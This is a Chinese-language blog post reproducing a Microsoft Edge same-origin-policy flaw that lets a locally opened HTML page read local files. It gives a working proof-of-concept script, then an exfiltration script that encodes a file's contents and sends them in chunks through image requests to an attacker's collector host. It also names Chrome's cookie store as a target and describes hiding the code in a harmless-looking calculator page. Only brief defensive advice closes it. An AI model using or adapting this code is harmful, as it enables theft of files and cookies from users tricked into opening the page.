Microsoft Edge同源策略不严导致任意文件读取测试

简介:

edge.png

漏洞介绍

近期看到文章介绍,称Microsoft Edge对SOP同源策略处理存在问题,可导致任意文件泄露。
SOP同源策略是比较常见的,简单来说,在访问A域名时,如果B域名站点存在JS动作通过XHR请求了A域名网站下资源,该动作会被同源策略拒绝,因为它们非同源。
同源的判定标准是一个三元组,任意一个不同则判定不同源:协议、主机名、端口号

在浏览器中,可以使用file://协议来读取文件,攻击者如果想要读取到访问者的本地文件,由于http和file协议不同,不同源的情况下并不能做到。
但是这个限制在特定场景下就不存在了,如果恶意页面是保存在本地的文件,通过浏览器打开html文件,URL中协议就是file://,此时如果页面中存在XHR请求file://协议,该请求是符合同源要求的,可能导致本地文件读取。

复现测试

0x01 准备工作

尝试读取的本地文件:

txt.png

poc代码:

<html>    
<head>     
</head>    
<body>        
<div id="result"></div>
</body>
<script>    
let resultDiv = document.getElementById("result");    
    let xhr= new XMLHttpRequest();       
    xhr.open("GET","file://F:/AppServ/www/ctf/edge/edge.txt");    
    xhr.onreadystatechange= ()=> {    
     if(xhr.readyState==4) {    
     resultDiv.innerText = xhr.responseText;    
     }    
    }    
    xhr.send();    
</script>      
</html>
0x02 非Microsoft Edge浏览器测试

Chrome浏览器:提示同源策略请求只支持http,data,chrome,chrome-extension,https协议
chrome.png

fireforx浏览器:提示同源策略进制读取,CORS只能是http协议
firefox.png

ie11浏览器:提示拒绝访问
ie.png

0x03 Microsoft Edge浏览器测试

看到的文章中测试版本是Microsoft Edge 40.15063.0.0,这里测试使用的是比它更新的版本:

version.png

测试结果是:没有触发错误拦截信息,能够直接获取到本地文件内容:

edge1.png

相关拓展

0x01 任意数据外带

在测试中是仅仅对一个txt文件内容进行了读取,并将内容展示在页面中。

还可以读取其他浏览器存储的一些cookie信息,如:
Chrome的cookie信息一般在

C:/Users/${user}/AppData/Local/Google/Chrome/User Data/Default/Cookies

cookie.png

攻击者如果想要通过恶意页面,将本地的数据带出,也是轻而易举的。比如,可以在js中创建img标签,发起http请求攻击者的服务器,并且携带读取到的文件内容。

如果文件内容过长,get请求的URL会超长,还能对文件内容进行分割、间隔多次传输;
如果文件内容不仅是文本文字,或是图片等,还能通过各种编码进行包装传输(如encodeURI):

let resultDiv = document.getElementById("result");
    let data = "";    
    let xhr= new XMLHttpRequest();    
    let limit = 1024
    xhr.open("GET","file://F:/AppServ/www/ctf/edge/edge.txt");    
    xhr.onreadystatechange= function () {    
        if(xhr.readyState==4) {    
            resultDiv.innerText = xhr.responseText;
            url =  "http://XXXXX.ceye.io/data/?data=";   
            // data = window.btoa(xhr.responseText);  
            data = encodeURI(xhr.responseText);  
            console.log(data.length)
            let st=setInterval(function(){
                img = document.createElement("img");
                if (data.length <= limit) {
                    if (data.length == 0) {
                        clearInterval(st)
                    }else {
                        img.src = url + data;
                        resultDiv.appendChild(img);
                        clearInterval(st)
                        console.log("A:"+data.length)
                    }
                } else {
                    temp = data.substr(0, limit);
                    data = data.substr(limit,data.length-1);
                    img.src = url + temp;
                    resultDiv.appendChild(img);
                    console.log("B:"+temp.length)
                } 
            },1000)
        }    
    }    
    xhr.send();

image.png

攻击者接收的数据段之一:

image1.png

0x02 隐藏伪装

造成任意文件内容泄露的JS代码本体并不大,可以隐藏在其他正常的下载页面中,在用户疏于防范的情况下隐蔽地执行;
结合社会工程等手段,可以更轻易地进行攻击利用。
例如,当下载一个用于学习html的网页,作者建议使用Microsoft Edge进行打开,你很可能会听从作者建议就运行查看效果

dir.png

calc.png

当页面功能显示正常,是一个计算器的网页,警惕心就没有了。
当你可能还沉浸在玩耍它的计算功能和学习源码的过程中时,攻击者想要的你本地文件内容可能已经被偷偷传走了

res.png

防护建议

1、不要随意打开不能确定是否存在危害的文件,包括html文件(先看一遍源代码)
2、使用解决了该问题的更新版本的Microsoft Edge
3、使用Chrome或者Firefox等浏览器

目录
相关文章
|
Web App开发 前端开发 JavaScript
|
2月前
|
Web App开发 缓存 安全
Microsoft Edge 五个神级插件
Microsoft Edge 五个神级插件
148 0
Microsoft Edge 五个神级插件
|
6月前
|
JavaScript 前端开发
WebView2 控件(基于 Microsoft Edge (Chromium) 的嵌入式浏览器控件),获取网页加载后的标题
在使用 WebView2 控件(基于 Microsoft Edge (Chromium) 的嵌入式浏览器控件)时,要获取网页加载后的标题,可以监听 WebView2 的 NavigationCompleted 事件。这个事件被触发时,表示导航已完成,此时执行JavaScript代码可以安全地获取网页的标题。
WebView2 控件(基于 Microsoft Edge (Chromium) 的嵌入式浏览器控件),获取网页加载后的标题
|
6月前
|
搜索推荐 Java 程序员
Microsoft Edge使用方法和心得
Microsoft Edge使用方法和心得
41 0
|
人工智能 Windows
Microsoft Edge有哪些你不知道却超级好用的插件?(Microsoft Edge功能测评)
Microsoft Edge有哪些你不知道却超级好用的插件?(Microsoft Edge功能测评)
321 0
断网了怎么办?那就快去体验【Microsoft Edge浏览器】提供的离线冲浪小游戏~娱乐一下
断网了怎么办?那就快去体验【Microsoft Edge浏览器】提供的离线冲浪小游戏~娱乐一下
247 0
|
f2etest Windows
F2etest 部署 Microsoft Edge 浏览器云
由于 Windows Server 版不支持 Edge,所以我们只能在 Windows 10 上进行配置部署,在部署 Microsoft Edge 之前,你需要准备如下:   Windows 10 专业版设备一台; 可部署 F2etest-web Linux 服务器一台,已部署则可忽略。   1. 安装远程服务   下载链接:https://gi
1789 0
下一篇
DataWorks